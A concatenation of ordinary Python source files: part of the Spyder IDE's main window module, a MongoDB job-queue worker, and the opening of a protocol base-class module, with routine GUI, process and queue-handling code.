msgBox.setIconPixmap(app_icon.pixmap(QSize(64, 64)))
msgBox.setTextInteractionFlags(
Qt.LinksAccessibleByMouse | Qt.TextSelectableByMouse)
msgBox.exec_()
@Slot()
def show_dependencies(self):
"""Show Spyder's Dependencies dialog box"""
from spyder.widgets.dependencies import DependenciesDialog
dlg = DependenciesDialog(self)
dlg.set_data(dependencies.DEPENDENCIES)
dlg.exec_()
def render_issue(self, description='', traceback=''):
"""Render issue before sending it to Github"""
# Get component versions
versions = get_versions()
# Get git revision for development version
revision = ''
if versions['revision']:
revision = versions['revision']
# Make a description header in case no description is supplied
if not description:
description = "### What steps reproduce the problem?"
# Make error section from traceback and add appropriate reminder header
if traceback:
error_section = ("### Traceback\n"
"```python-traceback\n"
"{}\n"
"```".format(traceback))
else:
error_section = ''
issue_template = """\
## Description
{description}
{error_section}
## Versions
* Spyder version: {spyder_version} {commit}
* Python version: {python_version}
* Qt version: {qt_version}
* {qt_api_name} version: {qt_api_version}
* Operating System: {os_name} {os_version}
### Dependencies
```
{dependencies}
```
""".format(description=description,
error_section=error_section,
spyder_version=versions['spyder'],
commit=revision,
python_version=versions['python'],
qt_version=versions['qt'],
qt_api_name=versions['qt_api'],
qt_api_version=versions['qt_api_ver'],
os_name=versions['system'],
os_version=versions['release'],
dependencies=dependencies.status())
return issue_template
@Slot()
def report_issue(self, body=None, title=None, open_webpage=False):
"""Report a Spyder issue to github, generating body text if needed."""
if body is None:
from spyder.widgets.reporterror import SpyderErrorDialog
report_dlg = SpyderErrorDialog(self, is_report=True)
report_dlg.show()
else:
if open_webpage:
if PY3:
from urllib.parse import quote
else:
from urllib import quote # analysis:ignore
from qtpy.QtCore import QUrlQuery
url = QUrl(__project_url__ + '/issues/new')
query = QUrlQuery()
query.addQueryItem("body", quote(body))
if title:
query.addQueryItem("title", quote(title))
url.setQuery(query)
QDesktopServices.openUrl(url)
@Slot()
def trouble_guide(self):
"""Open Spyder troubleshooting guide in a web browser."""
url = QUrl(__trouble_url__)
QDesktopServices.openUrl(url)
@Slot()
def google_group(self):
"""Open Spyder Google Group in a web browser."""
url = QUrl(__forum_url__)
QDesktopServices.openUrl(url)
@Slot()
def global_callback(self):
"""Global callback"""
widget = QApplication.focusWidget()
action = self.sender()
callback = from_qvariant(action.data(), to_text_string)
from spyder.plugins.editor.widgets.editor import TextEditBaseWidget
from spyder.plugins.ipythonconsole.widgets import ControlWidget
if isinstance(widget, (TextEditBaseWidget, ControlWidget)):
getattr(widget, callback)()
else:
return
def redirect_internalshell_stdio(self, state):
if state:
self.console.shell.interpreter.redirect_stds()
else:
self.console.shell.interpreter.restore_stds()
def open_external_console(self, fname, wdir, args, interact, debug, python,
python_args, systerm, post_mortem=False):
"""Open external console"""
if systerm:
# Running script in an external system terminal
try:
if CONF.get('main_interpreter', 'default'):
executable = get_python_executable()
else:
executable = CONF.get('main_interpreter', 'executable')
programs.run_python_script_in_terminal(
fname, wdir, args, interact, debug, python_args,
executable)
except NotImplementedError:
QMessageBox.critical(self, _("Run"),
_("Running an external system terminal "
"is not supported on platform %s."
) % os.name)
def execute_in_external_console(self, lines, focus_to_editor):
"""
Execute lines in IPython console and eventually set focus
to the Editor.
"""
console = self.ipyconsole
console.switch_to_plugin()
console.execute_code(lines)
if focus_to_editor:
self.editor.switch_to_plugin()
def open_file(self, fname, external=False):
"""
Open filename with the appropriate application
Redirect to the right widget (txt -> editor, spydata -> workspace, ...)
or open file outside Spyder (if extension is not supported)
"""
fname = to_text_string(fname)
ext = osp.splitext(fname)[1]
if encoding.is_text_file(fname):
self.editor.load(fname)
elif self.variableexplorer is not None and ext in IMPORT_EXT:
self.variableexplorer.import_data(fname)
elif not external:
fname = file_uri(fname)
programs.start_file(fname)
def open_external_file(self, fname):
"""
Open external files that can be handled either by the Editor or the
variable explorer inside Spyder.
"""
fname = encoding.to_unicode_from_fs(fname)
if osp.isfile(fname):
self.open_file(fname, external=True)
elif osp.isfile(osp.join(CWD, fname)):
self.open_file(osp.join(CWD, fname), external=True)
# ---- PYTHONPATH management, etc.
def get_spyder_pythonpath(self):
"""Return Spyder PYTHONPATH"""
active_path = [p for p in self.path if p not in self.not_active_path]
return active_path + self.project_path
def add_path_to_sys_path(self):
"""Add Spyder path to sys.path"""
for path in reversed(self.get_spyder_pythonpath()):
sys.path.insert(1, path)
def remove_path_from_sys_path(self):
"""Remove Spyder path from sys.path"""
for path in self.path + self.project_path:
while path in sys.path:
sys.path.remove(path)
@Slot()
def path_manager_callback(self):
"""Spyder path manager"""
from spyder.widgets.pathmanager import PathManager
self.remove_path_from_sys_path()
project_path = self.projects.get_pythonpath()
dialog = PathManager(self, self.path, project_path,
self.not_active_path, sync=True)
dialog.redirect_stdio.connect(self.redirect_internalshell_stdio)
dialog.exec_()
self.add_path_to_sys_path()
try:
encoding.writelines(self.path, self.SPYDER_PATH) # Saving path
encoding.writelines(self.not_active_path,
self.SPYDER_NOT_ACTIVE_PATH)
except EnvironmentError:
pass
self.sig_pythonpath_changed.emit()
def pythonpath_changed(self):
"""Projects PYTHONPATH contribution has changed"""
self.remove_path_from_sys_path()
self.project_path = self.projects.get_pythonpath()
self.add_path_to_sys_path()
self.sig_pythonpath_changed.emit()
@Slot()
def win_env(self):
"""Show Windows current user environment variables"""
self.dialog_manager.show(WinUserEnvDialog(self))
#---- Preferences
def apply_settings(self):
"""Apply settings changed in 'Preferences' dialog box"""
qapp = QApplication.instance()
# Set 'gtk+' as the default theme in Gtk-based desktops
# Fixes Issue 2036
if is_gtk_desktop() and ('GTK+' in QStyleFactory.keys()):
try:
qapp.setStyle('gtk+')
except:
pass
else:
style_name = CONF.get('appearance', 'windows_style',
self.default_style)
style = QStyleFactory.create(style_name)
if style is not None:
style.setProperty('name', style_name)
qapp.setStyle(style)
default = self.DOCKOPTIONS
if CONF.get('main', 'vertical_tabs'):
default = default|QMainWindow.VerticalTabs
if CONF.get('main', 'animated_docks'):
default = default|QMainWindow.AnimatedDocks
self.setDockOptions(default)
self.apply_panes_settings()
self.apply_statusbar_settings()
if CONF.get('main', 'use_custom_cursor_blinking'):
qapp.setCursorFlashTime(CONF.get('main', 'custom_cursor_blinking'))
else:
qapp.setCursorFlashTime(self.CURSORBLINK_OSDEFAULT)
def apply_panes_settings(self):
"""Update dockwidgets features settings"""
for plugin in (self.widgetlist + self.thirdparty_plugins):
features = plugin.FEATURES
if CONF.get('main', 'vertical_dockwidget_titlebars'):
features = features | QDockWidget.DockWidgetVerticalTitleBar
plugin.dockwidget.setFeatures(features)
plugin.update_margins()
def apply_statusbar_settings(self):
"""Update status bar widgets settings"""
show_status_bar = CONF.get('main', 'show_status_bar')
self.statusBar().setVisible(show_status_bar)
if show_status_bar:
for widget, name in ((self.mem_status, 'memory_usage'),
(self.cpu_status, 'cpu_usage')):
if widget is not None:
widget.setVisible(CONF.get('main', '%s/enable' % name))
widget.set_interval(CONF.get('main', '%s/timeout' % name))
else:
return
@Slot()
def edit_preferences(self):
"""Edit Spyder preferences"""
from spyder.preferences.configdialog import ConfigDialog
def _dialog_finished(result_code):
"""Restore preferences dialog instance variable."""
self.prefs_dialog_instance = None
if self.prefs_dialog_instance is None:
dlg = ConfigDialog(self)
self.prefs_dialog_instance = dlg
# Signals
dlg.finished.connect(_dialog_finished)
dlg.pages_widget.currentChanged.connect(
self.__preference_page_changed)
dlg.size_change.connect(self.set_prefs_size)
# Setup
if self.prefs_dialog_size is not None:
dlg.resize(self.prefs_dialog_size)
for PrefPageClass in self.general_prefs:
widget = PrefPageClass(dlg, main=self)
widget.initialize()
dlg.add_page(widget)
for plugin in [self.workingdirectory, self.editor,
self.projects, self.ipyconsole,
self.historylog, self.help, self.variableexplorer,
self.onlinehelp, self.explorer, self.findinfiles
] + self.thirdparty_plugins:
if plugin is not None:
try:
widget = plugin.create_configwidget(dlg)
if widget is not None:
dlg.add_page(widget)
except Exception:
# Avoid a crash at startup if a plugin's config
# page fails to load.
traceback.print_exc(file=sys.stderr)
if self.prefs_index is not None:
dlg.set_current_index(self.prefs_index)
# Check settings and show dialog
dlg.show()
dlg.check_all_settings()
dlg.exec_()
def __preference_page_changed(self, index):
"""Preference page index has changed"""
self.prefs_index = index
def set_prefs_size(self, size):
"""Save preferences dialog size"""
self.prefs_dialog_size = size
#---- Shortcuts
def register_shortcut(self, qaction_or_qshortcut, context, name,
add_sc_to_tip=False):
"""
Register QAction or QShortcut to Spyder main application,
with shortcut (context, name, default)
"""
self.shortcut_data.append( (qaction_or_qshortcut, context,
name, add_sc_to_tip) )
def apply_shortcuts(self):
"""Apply shortcuts settings to all widgets/plugins"""
toberemoved = []
for index, (qobject, context, name,
add_sc_to_tip) in enumerate(self.shortcut_data):
keyseq = QKeySequence( get_shortcut(context, name) )
try:
if isinstance(qobject, QAction):
if sys.platform == 'darwin' and \
qobject._shown_shortcut == 'missing':
qobject._shown_shortcut = keyseq
else:
qobject.setShortcut(keyseq)
if add_sc_to_tip:
add_shortcut_to_tooltip(qobject, context, name)
elif isinstance(qobject, QShortcut):
qobject.setKey(keyseq)
except RuntimeError:
# Object has been deleted
toberemoved.append(index)
for index in sorted(toberemoved, reverse=True):
self.shortcut_data.pop(index)
@Slot()
def show_shortcuts_dialog(self):
from spyder.widgets.shortcutssummary import ShortcutsSummaryDialog
dlg = ShortcutsSummaryDialog(None)
dlg.exec_()
# -- Open files server
def start_open_files_server(self):
self.open_files_server.setsockopt(socket.SOL_SOCKET,
socket.SO_REUSEADDR, 1)
port = select_port(default_port=OPEN_FILES_PORT)
CONF.set('main', 'open_files_port', port)
self.open_files_server.bind(('127.0.0.1', port))
self.open_files_server.listen(20)
while 1: # 1 is faster than True
try:
req, dummy = self.open_files_server.accept()
except socket.error as e:
# See Issue 1275 for details on why errno EINTR is
# silently ignored here.
eintr = errno.WSAEINTR if os.name == 'nt' else errno.EINTR
# To avoid a traceback after closing on Windows
if e.args[0] == eintr:
continue
# handle a connection abort on close error
enotsock = (errno.WSAENOTSOCK if os.name == 'nt'
else errno.ENOTSOCK)
if e.args[0] in [errno.ECONNABORTED, enotsock]:
return
raise
fname = req.recv(1024)
fname = fname.decode('utf-8')
self.sig_open_external_file.emit(fname)
req.sendall(b' ')
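# A minimal client-side sketch (not part of Spyder) of the protocol served
# above, assuming the port saved in the 'main'/'open_files_port' option: a
# client sends one UTF-8 encoded filename per connection and reads back the
# single-byte acknowledgement written by req.sendall(b' ').
#
#     import socket
#     client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
#     client.connect(('127.0.0.1', CONF.get('main', 'open_files_port')))
#     client.sendall(u'/path/to/file.py'.encode('utf-8'))
#     client.recv(1)   # wait for the acknowledgement byte
#     client.close()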
# ---- Quit and restart, and reset spyder defaults
@Slot()
def reset_spyder(self):
"""
Quit and reset Spyder and then Restart application.
"""
answer = QMessageBox.warning(self, _("Warning"),
_("Spyder will restart and reset to default settings: <br><br>"
"Do you want to continue?"),
QMessageBox.Yes | QMessageBox.No)
if answer == QMessageBox.Yes:
self.restart(reset=True)
@Slot()
def restart(self, reset=False):
"""
Quit and Restart Spyder application.
If reset is True, Spyder settings are reset to defaults on restart.
"""
# Get start path to use in restart script
spyder_start_directory = get_module_path('spyder')
restart_script = osp.join(spyder_start_directory, 'app', 'restart.py')
# Get any initial argument passed when spyder was started
# Note: Variables defined in bootstrap.py and spyder/app/start.py
env = os.environ.copy()
bootstrap_args = env.pop('SPYDER_BOOTSTRAP_ARGS', None)
spyder_args = env.pop('SPYDER_ARGS')
# Get current process and python running spyder
pid = os.getpid()
python = sys.executable
# Check if started with bootstrap.py
if bootstrap_args is not None:
spyder_args = bootstrap_args
is_bootstrap = True
else:
is_bootstrap = False
# Pass variables as environment variables (str) to restarter subprocess
env['SPYDER_ARGS'] = spyder_args
env['SPYDER_PID'] = str(pid)
env['SPYDER_IS_BOOTSTRAP'] = str(is_bootstrap)
env['SPYDER_RESET'] = str(reset)
if DEV:
if os.name == 'nt':
env['PYTHONPATH'] = ';'.join(sys.path)
else:
env['PYTHONPATH'] = ':'.join(sys.path)
# Build the command and popen arguments depending on the OS
if os.name == 'nt':
# Hide flashing command prompt
startupinfo = subprocess.STARTUPINFO()
startupinfo.dwFlags |= subprocess.STARTF_USESHOWWINDOW
shell = False
else:
startupinfo = None
shell = True
command = '"{0}" "{1}"'
command = command.format(python, restart_script)
try:
if self.closing(True):
subprocess.Popen(command, shell=shell, env=env,
startupinfo=startupinfo)
self.console.quit()
except Exception as error:
# If there is an error with subprocess, Spyder should not quit and
# the error can be inspected in the internal console
print(error) # spyder: test-skip
print(command) # spyder: test-skip
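# A hedged sketch (not Spyder's actual restart.py) of how a restarter process
# could read the environment variables set above; the variable names come
# from this method, the boolean parsing is an assumption.
#
#     import os
#     spyder_args = os.environ['SPYDER_ARGS']               # original CLI args
#     spyder_pid = int(os.environ['SPYDER_PID'])            # process to wait on
#     is_bootstrap = os.environ['SPYDER_IS_BOOTSTRAP'] == 'True'
#     reset = os.environ['SPYDER_RESET'] == 'True'          # wipe settings if True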
# ---- Interactive Tours
def show_tour(self, index):
"""Show interactive tour."""
self.maximize_dockwidget(restore=True)
frames = self.tours_available[index]
self.tour.set_tour(index, frames, self)
self.tour.start_tour()
# ---- Global File Switcher
def open_fileswitcher(self, symbol=False):
"""Open file list management dialog box."""
if self.fileswitcher is not None and \
self.fileswitcher.is_visible:
self.fileswitcher.hide()
self.fileswitcher.is_visible = False
return
if symbol:
self.fileswitcher.plugin = self.editor
self.fileswitcher.set_search_text('@')
else:
self.fileswitcher.set_search_text('')
self.fileswitcher.show()
self.fileswitcher.is_visible = True
def open_symbolfinder(self):
"""Open symbol list management dialog box."""
self.open_fileswitcher(symbol=True)
def add_to_fileswitcher(self, plugin, tabs, data, icon):
"""Add a plugin to the File Switcher."""
if self.fileswitcher is None:
from spyder.widgets.fileswitcher import FileSwitcher
self.fileswitcher = FileSwitcher(self, plugin, tabs, data, icon)
else:
self.fileswitcher.add_plugin(plugin, tabs, data, icon)
self.fileswitcher.sig_goto_file.connect(
plugin.get_current_tab_manager().set_stack_index)
# ---- Check for Spyder Updates
def _check_updates_ready(self):
"""Called by WorkerUpdates when ready"""
from spyder.widgets.helperwidgets import MessageCheckBox
# `feedback` = False is used on startup, so only positive feedback is
# given. `feedback` = True is used after startup (when using the menu
# action), and gives feedback whether updates are found or not.
feedback = self.give_updates_feedback
# Get results from worker
update_available = self.worker_updates.update_available
latest_release = self.worker_updates.latest_release
error_msg = self.worker_updates.error
url_r = __project_url__ + '/releases'
url_i = 'https://docs.spyder-ide.org/installation.html'
# Define the custom QMessageBox
box = MessageCheckBox(icon=QMessageBox.Information,
parent=self)
box.setWindowTitle(_("Spyder updates"))
box.set_checkbox_text(_("Check for updates on startup"))
box.setStandardButtons(QMessageBox.Ok)
box.setDefaultButton(QMessageBox.Ok)
# Adjust the checkbox depending on the stored configuration
section, option = 'main', 'check_updates_on_startup'
check_updates = CONF.get(section, option)
box.set_checked(check_updates)
if error_msg is not None:
msg = error_msg
box.setText(msg)
box.set_check_visible(False)
box.exec_()
check_updates = box.is_checked()
else:
if update_available:
anaconda_msg = ''
if 'Anaconda' in sys.version or 'conda-forge' in sys.version:
anaconda_msg = _("<hr><b>IMPORTANT NOTE:</b> It seems "
"that you are using Spyder with "
"<b>Anaconda/Miniconda</b>. Please "
"<b>don't</b> use <code>pip</code> to "
"update it as that will probably break "
"your installation.<br><br>"
"Instead, please wait until new conda "
"packages are available and use "
"<code>conda</code> to perform the "
"update.<hr>")
msg = _("<b>Spyder %s is available!</b> <br><br>Please use "
"your package manager to update Spyder or go to our "
"<a href=\"%s\">Releases</a> page to download this "
"new version. <br><br>If you are not sure how to "
"proceed to update Spyder please refer to our "
" <a href=\"%s\">Installation</a> instructions."
"") % (latest_release, url_r, url_i)
msg += '<br>' + anaconda_msg
box.setText(msg)
box.set_check_visible(True)
box.exec_()
check_updates = box.is_checked()
elif feedback:
msg = _("Spyder is up to date.")
box.setText(msg)
box.set_check_visible(False)
box.exec_()
check_updates = box.is_checked()
# Update checkbox based on user interaction
CONF.set(section, option, check_updates)
# Enable check_updates_action after the thread has finished
self.check_updates_action.setDisabled(False)
# Provide feedback when clicking menu if check on startup is on
self.give_updates_feedback = True
@Slot()
def check_updates(self, startup=False):
"""
Check for spyder updates on github releases using a QThread.
"""
from spyder.workers.updates import WorkerUpdates
# Disable check_updates_action while the thread is working
self.check_updates_action.setDisabled(True)
if self.thread_updates is not None:
self.thread_updates.terminate()
self.thread_updates = QThread(self)
self.worker_updates = WorkerUpdates(self, startup=startup)
self.worker_updates.sig_ready.connect(self._check_updates_ready)
self.worker_updates.sig_ready.connect(self.thread_updates.quit)
self.worker_updates.moveToThread(self.thread_updates)
self.thread_updates.started.connect(self.worker_updates.start)
self.thread_updates.start()
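# A generic sketch of the worker/QThread pattern used above (WorkerUpdates
# itself lives in spyder.workers.updates; the class below is only a
# hypothetical illustration of the same wiring).
#
#     from qtpy.QtCore import QObject, Signal
#
#     class ExampleWorker(QObject):
#         sig_ready = Signal()
#
#         def start(self):
#             # the long-running check runs here, off the GUI thread,
#             # because the worker was moved to the QThread before it started
#             self.sig_ready.emit()   # wakes _check_updates_ready and quits
#                                     # the thread via the second connection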
# --- For OpenGL
def _test_setting_opengl(self, option):
"""Get the current OpenGL implementation in use"""
if option == 'software':
return QCoreApplication.testAttribute(Qt.AA_UseSoftwareOpenGL)
elif option == 'desktop':
return QCoreApplication.testAttribute(Qt.AA_UseDesktopOpenGL)
elif option == 'gles':
return QCoreApplication.testAttribute(Qt.AA_UseOpenGLES)
#==============================================================================
# Utilities to create the 'main' function
#==============================================================================
def initialize():
"""Initialize Qt, patching sys.exit and eventually setting up ETS"""
# This doesn't create our QApplication, just holds a reference to
# MAIN_APP, created above to show our splash screen as early as
# possible
app = qapplication()
# --- Set application icon
app.setWindowIcon(APP_ICON)
#----Monkey patching QApplication
class FakeQApplication(QApplication):
"""Spyder's fake QApplication"""
def __init__(self, args):
self = app # analysis:ignore
@staticmethod
def exec_():
"""Do nothing because the Qt mainloop is already running"""
pass
from qtpy import QtWidgets
QtWidgets.QApplication = FakeQApplication
# ----Monkey patching sys.exit
def fake_sys_exit(arg=[]):
pass
sys.exit = fake_sys_exit
# ----Monkey patching sys.excepthook to avoid crashes in PyQt 5.5+
if PYQT5:
def spy_excepthook(type_, value, tback):
sys.__excepthook__(type_, value, tback)
sys.excepthook = spy_excepthook
# Removing arguments from sys.argv as in standard Python interpreter
sys.argv = ['']
# Selecting Qt4 backend for Enthought Tool Suite (if installed)
try:
from enthought.etsconfig.api import ETSConfig
ETSConfig.toolkit = 'qt4'
except ImportError:
pass
return app
class Spy(object):
"""
Inspect Spyder internals
Attributes:
app Reference to main QApplication object
window Reference to spyder.MainWindow widget
"""
def __init__(self, app, window):
self.app = app
self.window = window
def __dir__(self):
return list(self.__dict__.keys()) +\
[x for x in dir(self.__class__) if x[0] != '_']
def versions(self):
return get_versions()
def run_spyder(app, options, args):
"""
Create and show Spyder's main window
Start QApplication event loop
"""
#TODO: insert here
# Main window
main = MainWindow(options)
try:
main.setup()
except BaseException:
if main.console is not None:
try:
main.console.shell.exit_interpreter()
except BaseException:
pass
raise
main.show()
main.post_visible_setup()
if main.console:
main.console.shell.interpreter.namespace['spy'] = \
Spy(app=app, window=main)
# Open external files passed as args
if args:
for a in args:
main.open_external_file(a)
# Don't show icons in menus for Mac
if sys.platform == 'darwin':
QCoreApplication.setAttribute(Qt.AA_DontShowIconsInMenus, True)
# Open external files with our Mac app
if running_in_mac_app():
app.sig_open_external_file.connect(main.open_external_file)
# To give focus again to the last focused widget after restoring
# the window
app.focusChanged.connect(main.change_last_focused_widget)
if not running_under_pytest():
app.exec_()
return main
#==============================================================================
# Main
#==============================================================================
def main():
"""Main function"""
# **** For Pytest ****
# We need to create MainWindow **here** to avoid passing pytest
# options to Spyder
if running_under_pytest():
try:
from unittest.mock import Mock
except ImportError:
from mock import Mock # Python 2
options = Mock()
options.working_directory = None
options.profile = False
options.multithreaded = False
options.new_instance = False
options.project = None
options.window_title = None
options.opengl_implementation = None
options.debug_info = None
options.debug_output = None
if CONF.get('main', 'opengl') != 'automatic':
option = CONF.get('main', 'opengl')
set_opengl_implementation(option)
app = initialize()
window = run_spyder(app, options, None)
return window
# **** Collect command line options ****
# Note regarding Options:
# It's important to collect options before monkey patching sys.exit,
# otherwise, argparse won't be able to exit if --help option is passed
options, args = get_options()
# **** Set OpenGL implementation to use ****
if options.opengl_implementation:
option = options.opengl_implementation
set_opengl_implementation(option)
else:
if CONF.get('main', 'opengl') != 'automatic':
option = CONF.get('main', 'opengl')
set_opengl_implementation(option)
# **** Handle hide_console option ****
if options.show_console:
print("(Deprecated) --show-console does nothing, now the default "
"behavior is to show the console, use --hide-console if you "
"want to hide it")
if set_attached_console_visible is not None:
set_attached_console_visible(not options.hide_console
or options.reset_config_files
or options.reset_to_defaults
or options.optimize
or bool(get_debug_level()))
# **** Set debugging info ****
setup_logging(options)
# **** Create the application ****
app = initialize()
# **** Handle other options ****
if options.reset_config_files:
# <!> Remove all configuration files!
reset_config_files()
return
elif options.reset_to_defaults:
# Reset Spyder settings to defaults
CONF.reset_to_defaults(save=True)
return
elif options.optimize:
# Optimize the whole Spyder's source code directory
import spyder
programs.run_python_script(module="compileall",
args=[spyder.__path__[0]], p_args=['-O'])
return
# **** Show crash dialog ****
if CONF.get('main', 'crash', False) and not DEV:
CONF.set('main', 'crash', False)
if SPLASH is not None:
SPLASH.hide()
QMessageBox.information(
None, "Spyder",
"Spyder crashed during last session.<br><br>"
"If Spyder does not start at all and <u>before submitting a "
"bug report</u>, please try to reset settings to defaults by "
"running Spyder with the command line option '--reset':<br>"
"<span style=\'color: #555555\'><b>spyder --reset</b></span>"
"<br><br>"
"<span style=\'color: #ff5555\'><b>Warning:</b></span> "
"this command will remove all your Spyder configuration files "
"located in '%s').<br><br>"
"If Spyder still fails to launch, you should consult our "
"comprehensive <b><a href=\"%s\">Troubleshooting Guide</a></b>, "
"which when followed carefully solves the vast majority of "
"crashes; also, take "
"the time to search for <a href=\"%s\">known bugs</a> or "
"<a href=\"%s\">discussions</a> matching your situation before "
"submitting a report to our <a href=\"%s\">issue tracker</a>. "
"Your feedback will always be greatly appreciated."
"" % (get_conf_path(), __trouble_url__, __project_url__,
__forum_url__, __project_url__))
# **** Create main window ****
mainwindow = None
try:
mainwindow = run_spyder(app, options, args)
except FontError as fontError:
QMessageBox.information(None, "Spyder",
"Spyder was unable to load the <i>Spyder 3</i> "
"icon theme. That's why it's going to fallback to the "
"theme used in Spyder 2.<br><br>"
"For that, please close this window and start Spyder again.")
CONF.set('appearance', 'icon_theme', 'spyder 2')
except BaseException:
CONF.set('main', 'crash', True)
import traceback
traceback.print_exc(file=STDERR)
traceback.print_exc(file=open('spyder_crash.log', 'w'))
if mainwindow is None:
# An exception occurred
if SPLASH is not None:
SPLASH.hide()
return
ORIGINAL_SYS_EXIT()
if __name__ == "__main__":
main()
|
worker.py
|
#!/usr/bin/env python
# encoding: utf-8
"""
worker.py
Created by Kurtiss Hare on 2010-03-12.
"""
import datetime
import logging
import multiprocessing
import os
import pymongo.objectid
import signal
import socket
import time
import util
class MonqueWorker(object):
def __init__(self, monque, queues=None, dispatcher="fork"):
self._monque = monque
self._queues = queues or []
self._worker_id = None
self._child = None
self._shutdown_status = None
self._dispatcher = dispatcher
def register_worker(self):
self._worker_id = pymongo.objectid.ObjectId()
c = self._monque.get_collection('workers')
c.insert(dict(
_id = self._worker_id,
hostname = socket.gethostname(),
pid = os.getpid(),
start_time = None,
job = None,
retried = 0,
processed = 0,
failed = 0
))
def unregister_worker(self):
wc = self._monque.get_collection('workers')
wc.remove(dict(_id = self._worker_id))
def work(self, interval=5):
self.register_worker()
self._register_signal_handlers()
util.setprocname("monque: Starting")
try:
while not self._shutdown_status:
worked = self._work_once()
if interval == 0:
break
if not worked:
util.setprocname("monque: Waiting on queues: {0}".format(','.join(self._queues)))
time.sleep(interval)
finally:
self.unregister_worker()
def _work_once(self):
order = self._monque.dequeue(self._queues, grabfor=60*60)
if not order:
return False
if order:
try:
self.working_on(order)
self.process(order)
except Exception, e:
self._handle_job_failure(order, e)
else:
self.done_working(order)
finally:
c = self._monque.get_collection('workers')
c.update(dict(_id = self._worker_id), {
'$set' : dict(
start_time = None,
job = None,
)
})
return True
def working_on(self, order):
c = self._monque.get_collection('workers')
c.update(dict(_id = self._worker_id), {
'$set' : dict(
start_time = datetime.datetime.utcnow(),
job = order.job.__serialize__(),
)
})
c = self._monque.get_collection('queue_stats')
order.mark_start()
def process(self, order):
if self._dispatcher == "fork":
child = self._child = multiprocessing.Process(target=self._process_target, args=(order,))
self._child.start()
util.setprocname("monque: Forked {0} at {1}".format(self._child.pid, time.time()))
while True:
try:
child.join()
except OSError, e:
if 'Interrupted system call' not in str(e):
raise
continue
break
self._child = None
if child.exitcode != 0:
raise Exception("Job failed with exit code {0}".format(child.exitcode))
else:
self.dispatch(order)
def done_working(self, order):
self._monque.remove(order.queue, order.job_id)
self.processed(order)
def _process_target(self, order):
self.reset_signal_handlers()
self.dispatch(order)
def dispatch(self, order):
util.setprocname("monque: Processing {0} since {1}".format(order.queue, time.time()))
order.job.run()
def _handle_job_failure(self, order, e):
import traceback
logging.warn("Job failed ({0}): {1}\n{2}".format(order.job, str(e), traceback.format_exc()))
if order.retries > 0:
order.fail(e)
self._monque.update(order.queue, order.job_id, delay=min(2**(len(order.failures)-1), 60), failure=str(e))
wc = self._monque.get_collection('workers')
wc.update(dict(_id = self._worker_id), {'$inc' : dict(retried = 1)})
qs = self._monque.get_collection('queue_stats')
qs.update(dict(queue = order.queue), {'$inc' : dict(retries=1)}, upsert=True)
else:
self.failed(order)
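# The retry delay above grows exponentially with a 60 second cap:
# min(2**(len(failures)-1), 60). A tiny illustration of the schedule for the
# first eight failures (not part of the worker, only shows the arithmetic):
#
#     >>> [min(2**(n - 1), 60) for n in range(1, 9)]
#     [1, 2, 4, 8, 16, 32, 60, 60]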
def processed(self, order):
wc = self._monque.get_collection('workers')
wc.update(dict(_id = self._worker_id), {'$inc' : dict(processed = 1)})
duration = order.mark_completion()
qs = self._monque.get_collection('queue_stats')
qs.update(dict(queue = order.queue), {'$inc' : dict(successes=1, success_duration=duration.seconds)}, upsert=True)
# qs.update(dict(queue = order.queue), {'$inc' : dict(size=-1)}, upsert=True)
# qs.update(dict(queue = order.queue), {'$inc' : dict(success_duration=duration.seconds)}, upsert=True)
def failed(self, order):
wc = self._monque.get_collection('workers')
wc.update(dict(_id = self._worker_id), {'$inc' : dict(failed = 1)})
duration = order.mark_completion()
qs = self._monque.get_collection('queue_stats')
qs.update(dict(queue = order.queue), {'$inc' : dict(failures=1, failure_duration=duration.seconds)}, upsert=True)
# qs.update(dict(queue = order.queue), {'$inc' : dict(size=-1)}, upsert=True)
# qs.update(dict(queue = order.queue), {'$inc' : dict(failure_duration=duration.seconds)}, upsert=True)
def _register_signal_handlers(self):
signal.signal(signal.SIGQUIT, lambda num, frame: self._shutdown(graceful=True))
if self._dispatcher == "fork":
signal.signal(signal.SIGTERM, lambda num, frame: self._shutdown())
signal.signal(signal.SIGINT, lambda num, frame: self._shutdown())
signal.signal(signal.SIGUSR1, lambda num, frame: self._kill_child())
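# With these handlers installed, a running worker can be controlled from
# another process (sketch; worker_pid is a placeholder for the pid stored in
# the 'workers' collection):
#
#     import os, signal
#     os.kill(worker_pid, signal.SIGQUIT)  # finish current job, then exit
#     os.kill(worker_pid, signal.SIGTERM)  # shut down now and kill the child
#     os.kill(worker_pid, signal.SIGUSR1)  # kill only the forked child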
def reset_signal_handlers(self):
signal.signal(signal.SIGTERM, signal.SIG_DFL)
signal.signal(signal.SIGINT, signal.SIG_DFL)
signal.signal(signal.SIGQUIT, signal.SIG_DFL)
signal.signal(signal.SIGUSR1, signal.SIG_DFL)
def _shutdown(self, graceful = False):
if graceful:
logging.info("Worker {0._worker_id} shutting down gracefully.".format(self))
self._shutdown_status = "graceful"
else:
logging.info("Worker {0._worker_id} shutting down immediately.".format(self))
self._shutdown_status = "immediate"
self._kill_child()
def _kill_child(self):
if self._child:
logging.info("Killing child {0}".format(self._child))
if self._child.is_alive():
self._child.terminate()
self._child = None
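# A hedged usage sketch: building the Monque connection object happens outside
# this file, so 'monque' below is an assumption; the MonqueWorker API shown
# (queues list, dispatcher, work(interval)) is taken from the class above.
#
#     worker = MonqueWorker(monque, queues=['mail', 'default'], dispatcher="fork")
#     worker.work(interval=5)   # poll every 5 seconds until SIGQUIT/SIGTERM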
|
base.py
|
# -*- coding: utf-8 -*-
"""Internal module of protocols with abstract base classes.
Applications should not directly import this module, except to make subclasses.
As a reminder: all internal strings, like identifiers, should be
represented in UTF-8. Use pynt.xmlns.UTF8 if you need help converting."""
# builtin modules
import types
import logging
import time
import threading # for AsyncInput
# import traceback
# local modules
import exceptions
class BaseIOInput(object):
"""Base I/O input. Abstract class, forming a third part of the BaseInput class, along with BaseLangInput and BaseCommandInput"""
timeout = 30 # default time-out in seconds
# I/O SPECIFIC METHODS
def __init__(self):
"""Prepares the actual underlying I/O, using the parameters supplied at initialization
(e.g. hostname, port, filename, URL, File object). If possible, delays actually opening
the I/O until connect() is called, so that setLoginCredentials() can be called in the
meantime."""
pass
def getTarget(self):
"""Return a human-readable identifier of the I/O object. For example, the hostname or the filename"""
return "baseIO"
def connect(self):
"""Opens the actual I/O connection to file or device. This is called just before login() and authorize()"""
pass
def disconnect(self):
"""Closes the I/O connection. You shouldn't call it more than once. Sets the actual I/O object to None, if any"""
pass
def setDefaultTimeout(self, timeout):
self.timeout = int(timeout)
def login(self):
"""Login to a terminal, using I/O specific (rather than language-specific) routines.
